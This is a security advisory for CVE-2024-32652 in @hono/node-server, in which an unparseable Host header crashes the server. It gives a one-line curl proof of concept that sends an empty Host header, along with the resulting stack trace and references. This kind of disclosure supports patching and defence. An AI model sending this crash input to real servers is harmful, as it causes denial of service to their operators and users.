CVE-2024-32652: @hono/node-server has Denial of Service risk when receiving Host header that cannot be parsed
The application hangs when receiving a Host header with a value that @hono/node-server can’t handle well. Invalid values are those that cannot be parsed by the URL as a hostname such as an empty string, slashes /, and other strings.
For example, if you have a simple application:
import { serve } from '@hono/node-server'
import { Hono } from 'hono'
const app = new Hono()
app.get('/', (c) => c.text('Hello'))
serve(app)
Sending a request with a Host header with an empty value to it:
curl localhost:3000/ -H "Host: "
The results:
node:internal/url:775
this.#updateContext(bindingUrl.parse(input, base));
^
TypeError: Invalid URL
at new URL (node:internal/url:775:36)
at newRequest (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:137:17)
at Server.<anonymous> (/Users/yusuke/work/h/159/node_modules/@hono/node-server/dist/index.js:399:17)
at Server.emit (node:events:514:28)
at Server.emit (node:domain:488:12)
at parserOnIncoming (node:_http_server:1143:12)
at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17) {
code: 'ERR_INVALID_URL',
input: 'http:///'
}
References
- github.com/advisories/GHSA-hgxw-5xg3-69jx
- github.com/honojs/node-server
- github.com/honojs/node-server/commit/306d98f02a8671a0a1fb91ac8fe7e281690c05af
- github.com/honojs/node-server/issues/159
- github.com/honojs/node-server/issues/161
- github.com/honojs/node-server/security/advisories/GHSA-hgxw-5xg3-69jx
- nvd.nist.gov/vuln/detail/CVE-2024-32652
Detect and mitigate CVE-2024-32652 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →